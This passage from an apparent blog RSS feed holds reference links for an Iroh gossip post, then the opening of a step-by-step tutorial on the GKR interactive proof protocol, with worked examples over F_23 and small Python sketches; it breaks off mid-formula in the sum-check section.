&lt;p&gt;Many thanks to the Iroh team for taking the time to answer our questions!&lt;&#x2F;p&gt;
&lt;p&gt;References&lt;br &#x2F;&gt;
• &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iroh.computer&#x2F;proto&#x2F;iroh-gossip&quot;&gt;https:&#x2F;&#x2F;www.iroh.computer&#x2F;proto&#x2F;iroh-gossip&lt;&#x2F;a&gt;&lt;br &#x2F;&gt;
• &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.bartoszsypytkowski.com&#x2F;hyparview&quot;&gt;https:&#x2F;&#x2F;www.bartoszsypytkowski.com&#x2F;hyparview&lt;&#x2F;a&gt;&lt;br &#x2F;&gt;
• &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;asc.di.fct.unl.pt&#x2F;~jleitao&#x2F;pdf&#x2F;dsn07-leitao.pdf&quot;&gt;https:&#x2F;&#x2F;asc.di.fct.unl.pt&#x2F;~jleitao&#x2F;pdf&#x2F;dsn07-leitao.pdf&lt;&#x2F;a&gt;&lt;br &#x2F;&gt;
• &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.bartoszsypytkowski.com&#x2F;plumtree&#x2F;&quot;&gt;https:&#x2F;&#x2F;www.bartoszsypytkowski.com&#x2F;plumtree&#x2F;&lt;&#x2F;a&gt;&lt;br &#x2F;&gt;
• &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;asc.di.fct.unl.pt&#x2F;~jleitao&#x2F;pdf&#x2F;srds07-leitao.pdf&quot;&gt;https:&#x2F;&#x2F;asc.di.fct.unl.pt&#x2F;~jleitao&#x2F;pdf&#x2F;srds07-leitao.pdf&lt;&#x2F;a&gt;&lt;br &#x2F;&gt;
• &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iroh.computer&#x2F;proto&#x2F;iroh-docs&quot;&gt;https:&#x2F;&#x2F;www.iroh.computer&#x2F;proto&#x2F;iroh-docs&lt;&#x2F;a&gt;&lt;br &#x2F;&gt;
• &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iroh.computer&#x2F;proto&#x2F;iroh-blobs&quot;&gt;https:&#x2F;&#x2F;www.iroh.computer&#x2F;proto&#x2F;iroh-blobs&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>GKR protocol: a step-by-step example</title>
          <pubDate>Wed, 05 Mar 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/gkr-protocol-a-step-by-step-example/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/gkr-protocol-a-step-by-step-example/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/gkr-protocol-a-step-by-step-example/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;An interactive proof is a protocol between two parties, a prover $\mathcal{P}$ and a verifier $\mathcal{V}$, where the prover attempts to convince the verifier of the validity of a statement. By leveraging randomness and interaction, the verifier can check the statement more efficiently than by doing everything himself. There is always a trivial way in which we can verify a computation: re-execution. This is how blockchains achieve verifiability: each node re-executes transactions and then reaches consensus. However, this is inefficient since every node must repeat the same computations, leading to bottlenecks. Succinct proofs allow us to check computations much faster, avoiding re-execution and solving blockchain scalability issues. For an introduction to interactive proof systems, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;people.cs.georgetown.edu&#x2F;jthaler&#x2F;ProofsArgsAndZK.pdf&quot;&gt;Thaler&lt;&#x2F;a&gt;. One such protocol is the sum-check protocol, proposed by Lund, Fortnow, Karloff, and Nisan in 1992, which is one of the building blocks used by several proof systems.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.microsoft.com&#x2F;en-us&#x2F;research&#x2F;wp-content&#x2F;uploads&#x2F;2016&#x2F;12&#x2F;2008-DelegatingComputation.pdf&quot;&gt;GKR protocol&lt;&#x2F;a&gt; (Goldwasser–Kalai–Rothblum) extends the idea of the &lt;a href=&quot;&#x2F;have-you-checked-your-sums&#x2F;&quot;&gt;sum-check protocol&lt;&#x2F;a&gt; for efficient verification of arithmetic circuits. The protocol allows a verifier to check that a computation—expressed as a logarithmic‐depth circuit with low-degree gates—has been executed correctly. This is achieved with only $O(\log⁡(n))$ rounds of interaction and a total of $O(\text{poly} \log(n))$ operations.&lt;&#x2F;p&gt;
&lt;p&gt;The key idea of the GKR protocol is that instead of evaluating the entire circuit, it uses the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;people.cs.georgetown.edu&#x2F;jthaler&#x2F;sumcheck.pdf&quot;&gt;sum-check&lt;&#x2F;a&gt; protocol recursively to verify the partial sums that represent the computed value efficiently. This method enables a resource-limited verifier to check computations far larger than what they could perform on their own by leveraging the underlying algebraic structure of the problem. The advantage of the GKR protocol is that one avoids having to commit to intermediate results in the circuit, which is usually the expensive part of many proof systems.&lt;&#x2F;p&gt;
&lt;p&gt;This post will explain how the protocol works with an example. For additional explanations on the protocol, we recommend watching doubly efficient interactive proofs &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=db1xAyO4YgM&amp;amp;list=PLUl4u3cNGP61EZllk7zwgvPbI4kbnKhWz&amp;amp;index=3&quot;&gt;part 1&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=Ob1fFHAXlJQ&amp;amp;list=PLUl4u3cNGP61EZllk7zwgvPbI4kbnKhWz&amp;amp;index=4&quot;&gt;part 2&lt;&#x2F;a&gt; or reading &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;people.cs.georgetown.edu&#x2F;jthaler&#x2F;ProofsArgsAndZK.pdf&quot;&gt;Thaler’s book&lt;&#x2F;a&gt; or this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;65610.csail.mit.edu&#x2F;2024&#x2F;lec&#x2F;l12-gkr.pdf&quot;&gt;short note&lt;&#x2F;a&gt;. The GKR protocol is used to improve the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1284&quot;&gt;LogUp lookup argument&lt;&#x2F;a&gt;. You can take a look at the implementation in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stwo&#x2F;tree&#x2F;dev&#x2F;crates&#x2F;prover&#x2F;src&#x2F;core&#x2F;lookups&quot;&gt;Stwo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;protocol&quot;&gt;Protocol&lt;&#x2F;h2&gt;
&lt;p&gt;The goal of this post is to explain the protocol in detail. To do so, we will use a simple example and follow, step by step, everything that both the prover ($\mathcal{P}$) and the verifier ($\mathcal{V}$) do.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Note: We will consider the interactive version of the protocol. &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;You can turn it into a non-interactive protocol with the Fiat-Shamir&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;transformation. &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
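The Fiat-Shamir transformation replaces each of the verifier's random challenges with a hash of the transcript so far. The following is a minimal illustrative sketch (our own code, not part of any real implementation), assuming SHA-256 as the hash and reusing the post's toy modulus; production systems need a large field, domain separation, and careful transcript encoding:

```python
import hashlib

P = 23  # toy modulus from this post's example; real systems use a large field

def challenge(transcript):
    # Derive a "random" field element deterministically from the transcript,
    # so anyone can recompute the verifier's challenge from public data.
    digest = hashlib.sha256(transcript).digest()
    return int.from_bytes(digest, "big") % P

# Example: derive the first challenge from the claimed outputs.
r0 = challenge(b"claimed outputs: 18, 7")
print(r0)
```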
&lt;p&gt;Let’s begin by describing the computation we wish to prove. We must express the computation as a log-space uniform arithmetic circuit $\mathcal{C}$ of fan-in 2 over a finite field $\mathbb{F}_p$. This means that:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The circuit has only two types of gates: addition and multiplication.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * It is layered so that each gate is connected to only two gates in the previous layer (possibly the same gate).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * In each layer $i$, the number of gates is $S_i = 2^{k_i}$ where $k_i \in \mathbb{N}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * All values are elements of $\mathbb{F_{p}}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;blockquote&gt;
&lt;p&gt;Let’s build a circuit that meets these conditions:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;ByBJecQFkl.png&quot; alt=&quot;circuit_gkr&quot; &#x2F;&gt;&lt;br &#x2F;&gt;
Figure 1: Diagram of the arithmetic circuit used in the GKR protocol example.&lt;&#x2F;p&gt;
&lt;p&gt;This circuit models a program that has two inputs and two outputs, and we work over the field $\mathbb{F_{23}}$.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h4 id=&quot;the-final-goal-of-the-protocol-is-for-the-prover-to-provide-the-outputs-of-the-program-to-the-verifier-and-convince-the-verifier-that-these-outputs-were-computed-correctly-from-the-public-inputs&quot;&gt;&lt;strong&gt;The final goal of the protocol is for the prover to provide the outputs of the program to the verifier and convince the verifier that these outputs were computed correctly from the public inputs.&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Recall that both the circuit and the inputs are public.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;part-one-sharing-the-results&quot;&gt;Part One: Sharing the Results&lt;&#x2F;h2&gt;
&lt;p&gt;We can divide this into several steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Output Claim:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The prover $\mathcal{P}$ sends the verifier $\mathcal{V}$ the values claimed to be the circuit outputs. &lt;em&gt;These values are sent in the form of a function&lt;&#x2F;em&gt; $D: \{0,1\}^{ k_0 } \to \mathbb{F_{p}}$.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;For our example: $k_0 = 1$, so $\mathcal{P}$ sends the linear polynomial $D$ satisfying:&lt;&#x2F;p&gt;
&lt;p&gt;$$D(0) = 18$$ $$D(1) = 7$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Random Challenge:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;A key resource we’ll use frequently in the protocol is having the verifier select a random point and send it to the prover. The prover must then incorporate this point into their calculations. This prevents the prover from precomputing results and trying to deceive the verifier.&lt;&#x2F;p&gt;
&lt;p&gt;$\mathcal{V}$ picks a random $r_0 \in \mathbb{F}^{ k_0 }$ and sends it to $\mathcal{P}$.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Let’s pick $r_0 = 2$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Computing the Multilinear Extension:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Both $\mathcal{V}$ and $\mathcal{P}$ compute $\tilde D(r_0)$, where $\tilde D({x})$ is the multilinear extension of $D$. This is the unique multilinear polynomial over $\mathbb{F_{p}}$ satisfying:&lt;br &#x2F;&gt;
$$\tilde D(x) = D(x) \ \forall x \in \{0, 1\}^v$$&lt;&#x2F;p&gt;
&lt;p&gt;This is a $v$-variate polynomial over $\mathbb{F_{p}}$ where $\tilde D({x})$ agrees with $D({x})$ at all boolean-valued inputs (bitstrings of a given length). It acts as a distance-amplifying encoding of $D({x})$ because, if another function $D’({x})$ disagrees at even a single input, the extension $\tilde D({x})$ will differ from $\tilde D’({x})$ at almost every point outside the original domain. This is a consequence of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Schwartz%E2%80%93Zippel_lemma&quot;&gt;Schwartz-Zippel lemma&lt;&#x2F;a&gt;, which states that the probability that a randomly chosen point is a zero of a nonzero multilinear polynomial is at most $v &#x2F; \lvert \mathbb{F_p} \rvert$ (negligible for a sufficiently large field).&lt;&#x2F;p&gt;
&lt;p&gt;Using Lagrange interpolation, we have:&lt;br &#x2F;&gt;
$$\tilde f (x_1, \ldots, x_v) = \sum_{w \in \{0, 1\}^v} f(w) \cdot \chi_w(x_1, \ldots, x_v)$$&lt;&#x2F;p&gt;
&lt;p&gt;where $\chi_w$ are the (multilinear) Lagrange basis polynomials: $$\chi_w(x_1, \ldots, x_v) = \prod_{i = 1}^{v} (x_i \cdot w_i + (1-x_i)(1-w_i))$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;In our case (with $k_0=1$):&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{align} \tilde D(x) &amp;amp;= D(0) \cdot (x \cdot 0 + (1-x)(1-0)) + D(1) \cdot (x \cdot 1 + (1 - x)(1 - 1)) \newline&lt;br &#x2F;&gt;
&amp;amp;= D(0)\cdot(1-x) + D(1) \cdot x = 18(1-x)+7x\end{align}$$&lt;&#x2F;p&gt;
&lt;p&gt;Thus:&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde D(r_0) = \tilde D(2) = -4 \equiv 19 \text{ mod } (23)$$&lt;&#x2F;p&gt;
&lt;p&gt;We denote this value by:&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde D(r_0) = 19 = m_0.$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
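The hand computation above can be reproduced in a few lines. This is a sketch of our own (not taken from any library), implementing the Lagrange-basis formula for the multilinear extension over $\mathbb{F}_{23}$:

```python
P = 23  # the field modulus from the example

def chi(w, x):
    # Multilinear Lagrange basis polynomial chi_w evaluated at point x, mod P
    out = 1
    for wi, xi in zip(w, x):
        out = out * (xi * wi + (1 - xi) * (1 - wi)) % P
    return out

def mle(values, x):
    # Evaluate the multilinear extension of f at x, where values[w] = f(w)
    return sum(fw * chi(w, x) for w, fw in values.items()) % P

D = {(0,): 18, (1,): 7}            # the claimed outputs
print(mle(D, (0,)), mle(D, (1,)))  # 18 7: agrees with D on {0,1}
print(mle(D, (2,)))                # 19: the value m_0 = D~(r_0) at r_0 = 2
```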
&lt;p&gt;Now, we can see that verifying the program’s outputs comes down to checking that:&lt;br &#x2F;&gt;
$$m_0 = \tilde W_0(r_0)$$&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;Before continuing, let’s introduce an additional notation. For each layer $i$ of the circuit, we will denote&lt;&#x2F;p&gt;
&lt;p&gt;$$W_i: \{0,1\}^{ k_i } \to \mathbb{F_{p}}$$&lt;&#x2F;p&gt;
&lt;p&gt;to be the function that maps a node’s position to its actual value, let $\tilde W_i(x)$ be its multilinear extension.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;B1M6_kEtkx.png&quot; alt=&quot;Screenshot 2025-02-07 at 5.09.49 PM&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;With this notation, the verifier’s task can be seen as checking that&lt;&#x2F;p&gt;
&lt;p&gt;$$D(x) = W_0(x)$$&lt;&#x2F;p&gt;
&lt;p&gt;since $D(x)$ represents the claimed outputs and $W_0(x)$ represents the correct values. Because multilinear extensions are unique, this is equivalent to verifying that:&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde D(x) = \tilde W_0(x)$$&lt;&#x2F;p&gt;
&lt;p&gt;Finally, by the Schwartz-Zippel lemma, it suffices to check that&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde D(r_0) = \tilde W_0(r_0)$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;But wait! The verifier cannot directly access $W_0(x)$. That is precisely the point of the protocol!&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
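To see the distance amplification concretely, here is a small sketch (our own illustration): two output claims that differ at a single boolean input have extensions that disagree at almost every point of $\mathbb{F}_{23}$, so a single random evaluation exposes a false claim with high probability.

```python
P = 23

def mle1(f0, f1, x):
    # Multilinear extension of a one-variable boolean function: f0*(1-x) + f1*x, mod P
    return (f0 * (1 - x) + f1 * x) % P

# An honest claim (18, 7) versus a cheating claim (18, 8): they agree at input 0.
disagreements = sum(1 for x in range(P) if mle1(18, 7, x) != mle1(18, 8, x))
print(disagreements)  # 22: the two extensions agree only at x = 0
```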
&lt;h2 id=&quot;part-two-modeling-the-circuit&quot;&gt;Part Two: Modeling the circuit&lt;&#x2F;h2&gt;
&lt;p&gt;In this phase, the goal is to verify that the sum of many terms (corresponding to a node’s computed value) equals $m_0$.&lt;&#x2F;p&gt;
&lt;p&gt;To do this efficiently, we use the sum-check protocol.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;introducing-the-wiring-functions&quot;&gt;Introducing the Wiring Functions&lt;&#x2F;h4&gt;
&lt;p&gt;We define two functions that capture the circuit’s wiring:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Addition Function**.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This function marks all the addition nodes in layer $i$. It takes as input:&lt;&#x2F;p&gt;
&lt;p&gt;$$x \in \{0,1\}^{k_i + 2k_{i + 1}}$$&lt;&#x2F;p&gt;
&lt;p&gt;which encodes the position $a$ of an addition node in the current layer, along with the positions $b$ and $c$ of the two nodes in the next layer to which it is connected.&lt;&#x2F;p&gt;
&lt;p&gt;The function $\text{Add}_i$ is defined to be 1 when $x = (a,b,c)$ corresponds to a valid addition node with the proper inputs and zero otherwise.&lt;&#x2F;p&gt;
&lt;p&gt;Just like with $\tilde D(x)$, we will need to create the multilinear extension: $\widetilde{\text{Add}}_i(x)$.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;In our circuit:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;SyIm5y4F1x.png&quot; alt=&quot;Screenshot 2025-02-07 at 5.15.38 PM&quot; &#x2F;&gt;&lt;br &#x2F;&gt;
The output addition node is at position: $$a = (1)$$&lt;br &#x2F;&gt;
And is connected to nodes: $$b: (1,0) \ \ c: (1,1)$$&lt;br &#x2F;&gt;
Since this is the only addition node, we define the function:&lt;br &#x2F;&gt;
$$\text{Add}_1(x) = \begin{cases}&lt;br &#x2F;&gt;
1 &amp;amp; \text{if } x = (1,1,0,1,1)\newline&lt;br &#x2F;&gt;
0 &amp;amp; \text{if not}.&lt;br &#x2F;&gt;
\end{cases}$$&lt;br &#x2F;&gt;
We then extend this function to a multilinear polynomial, denoted $\widetilde{\text{Add}}_i(x)$:&lt;&#x2F;p&gt;
&lt;p&gt;$$\widetilde{\text{Add}}_1 (x_1, x_2, x_3, x_4, x_5) = x_1 \cdot x_2 \cdot (1 - x_3) \cdot x_4 \cdot x_5 $$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
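As a quick sanity check (a sketch with our own function names), the extension $\widetilde{\text{Add}}_1$ above should evaluate to 1 on exactly one boolean tuple, $(1,1,0,1,1)$, and the analogous product for the multiplication gate defined next in the post should be 1 exactly on $(0,0,0,0,1)$:

```python
from itertools import product

P = 23

def add1(x1, x2, x3, x4, x5):
    # Multilinear extension of Add_1: x1*x2*(1-x3)*x4*x5
    return (x1 * x2 * (1 - x3) * x4 * x5) % P

def mult1(x1, x2, x3, x4, x5):
    # Multilinear extension of Mult_1: (1-x1)*(1-x2)*(1-x3)*(1-x4)*x5
    return ((1 - x1) * (1 - x2) * (1 - x3) * (1 - x4) * x5) % P

# Each predicate is 1 on exactly its wiring tuple and 0 elsewhere.
for bits in product((0, 1), repeat=5):
    assert add1(*bits) == (1 if bits == (1, 1, 0, 1, 1) else 0)
    assert mult1(*bits) == (1 if bits == (0, 0, 0, 0, 1) else 0)
print("wiring predicates check out")
```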
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Multiplication Function**.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Similarly, we define the function $\text{Mult}_i(x)$ for the multiplication nodes and its multilinear extension.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;For the Multiplication node in our first layer:&lt;br &#x2F;&gt;
$$\text{Mult}_1(x) = \begin{cases}&lt;br &#x2F;&gt;
1 &amp;amp; \text{if } x = (0,0,0,0,1)\newline&lt;br &#x2F;&gt;
0 &amp;amp; \text{if not}.&lt;br &#x2F;&gt;
\end{cases}$$&lt;br &#x2F;&gt;
Its multilinear extension is given by&lt;br &#x2F;&gt;
$$\widetilde{\text{Mult}}_1(x_1, x_2, x_3, x_4, x_5) = (1 - x_1) \cdot (1-x_2) \cdot (1 - x_3) \cdot (1 - x_4) \cdot x_5 $$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Finally, we need to connect these two new functions. For that, we can define a function that “computes” the value of a node in layer $i$ given the values in the next layer:&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde f^{(i)}(a,b,c) := \widetilde{\text{Add}}_i(a,b,c)\cdot(\tilde W_{i + 1}(b) + \tilde W_{i + 1}(c)) + \widetilde{\text{Mult}}_i(a,b,c) \cdot \tilde W_{i + 1}(b) \cdot \tilde W_{i + 1}(c)$$&lt;&#x2F;p&gt;
&lt;p&gt;When this function is evaluated on the values $(a,b,c)$ corresponding to a node in layer $i$, it yields the value of that node.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;In our first layer:&lt;br &#x2F;&gt;
$$\tilde f^{(0)}(0,0,0,0,1) = 18$$ $$\tilde f^{(0)}(1,1,0,1,1) = 7$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
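These two evaluations can be checked mechanically. In the sketch below, the layer-1 node values (3, 6, 4, 3) are read off the interpolation that appears later in the post; treat them, and the function names, as assumptions of this sketch rather than something derived here:

```python
P = 23
# Assumed layer-1 node values, read off the post's later interpolation
W1 = {(0, 0): 3, (0, 1): 6, (1, 0): 4, (1, 1): 3}

def add0(a, b, c):
    # Wiring predicate for the single addition gate: 1 on (1,(1,0),(1,1))
    return 1 if (a,) + b + c == (1, 1, 0, 1, 1) else 0

def mult0(a, b, c):
    # Wiring predicate for the single multiplication gate: 1 on (0,(0,0),(0,1))
    return 1 if (a,) + b + c == (0, 0, 0, 0, 1) else 0

def f0(a, b, c):
    # f^(0)(a,b,c) = Add*(W(b)+W(c)) + Mult*W(b)*W(c), mod P
    return (add0(a, b, c) * (W1[b] + W1[c])
            + mult0(a, b, c) * W1[b] * W1[c]) % P

print(f0(0, (0, 0), (0, 1)))  # 18: the multiplication output, 3 * 6
print(f0(1, (1, 0), (1, 1)))  # 7: the addition output, 4 + 3
```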
&lt;p&gt;This function is handy, but we can go one step further: if we fix $a = r$ and sum over all possible binary assignments for $b$ and $c$, we obtain:&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum_{(b,c) \in \{0,1\}^{ 2k_{i+1} }} \tilde f^{(i)}(r,b,c) = \tilde W_i(r)$$&lt;&#x2F;p&gt;
&lt;p&gt;We denote the function with $a$ fixed at $r$ by $\tilde f_r^{(i)}(b,c)$; it is a polynomial in the $2k_{i+1}$ variables $b$ and $c$.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;Let’s go back a bit and not lose sight of the objective we had. We had reached the point where what we wanted to check was:&lt;br &#x2F;&gt;
$$\tilde D(r_0) = \tilde W_0(r_0)$$&lt;&#x2F;p&gt;
&lt;p&gt;or equivalently,&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde W_0(r_0) = m_0$$&lt;&#x2F;p&gt;
&lt;p&gt;So, with the new function $\tilde f$, we can restate this as:&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum_{(b,c) \in \{0,1\}^{2k_1}} \tilde f_{r_0}^{(0)}(b,c) = m_0$$&lt;&#x2F;p&gt;
&lt;p&gt;To verify this equality, which involves many additions, we will employ the sum-check protocol.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;part-three-sum-check&quot;&gt;Part Three: Sum-check&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s describe, step by step, all the operations performed by the prover and the verifier during this phase to better understand the protocol.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The prover $\mathcal{P}$ builds a new function $g_1(z)$:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$g_1(z): \mathbb{F_{p}} \to \mathbb{F_{p}}$$&lt;br &#x2F;&gt;
$$g_1(z) := \sum_{ (x_2, x_3, \ldots , x_{ 2k_1 }) \in \{0,1\}^{2k_1 - 1} } \tilde f_{r_0}^{(0)} (z, x_2, \ldots, x_{2k_1})$$&lt;&#x2F;p&gt;
&lt;p&gt;In other words, we leave the first coordinate of $x$ in $\tilde f_{r_0}^{(0)} (x)$ as the free variable $z$ and sum over all possible assignments of the remaining coordinates.&lt;&#x2F;p&gt;
&lt;p&gt;Observe that this function satisfies:&lt;&#x2F;p&gt;
&lt;p&gt;$$g_1(0) + g_1(1) = m_0$$&lt;&#x2F;p&gt;
&lt;p&gt;Because $g_1(0)$ sums over all combinations with the first coordinate set to 0, and $g_1(1)$ does so for the first coordinate equal to 1.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;In our case, since $k_1 = 2$ (i.e. there are $2^2$ nodes in layer 1), we have:&lt;br &#x2F;&gt;
$$g_1 (z) = \sum_{ (x_2, x_3, x_4) \in \{0, 1\}^3 } \tilde f_{r_0}^{(0)} (z, x_2, x_3, x_4).$$&lt;br &#x2F;&gt;
$$\begin{align}&lt;br &#x2F;&gt;
\tilde f_{ r_0 }^{(0)} (b, c) = &amp;amp; \ 2b_1 (1 - b_2) c_1 c_2 \Big[&lt;br &#x2F;&gt;
(3(1 - b_1)(1 - b_2) + 6(1 - b_1)b_2 + 4b_1(1 - b_2) + 3b_1b_2) \notag \newline&lt;br &#x2F;&gt;
&amp;amp; \quad + (3(1 - c_1)(1 - c_2) + 6(1 - c_1)c_2 + 4c_1 (1 - c_2) + 3c_1 c_2 ) \Big] \notag \newline&lt;br &#x2F;&gt;
&amp;amp; - (1 - b_1)(1 - b_2)(1 - c_1)c_2 \notag \newline&lt;br &#x2F;&gt;
&amp;amp; \Big[ (3(1 - b_1)(1 - b_2) + 6(1 - b_1)b_2 + 4b_1(1 - b_2) + 3b_1b_2 ) \notag \newline&lt;br &#x2F;&gt;
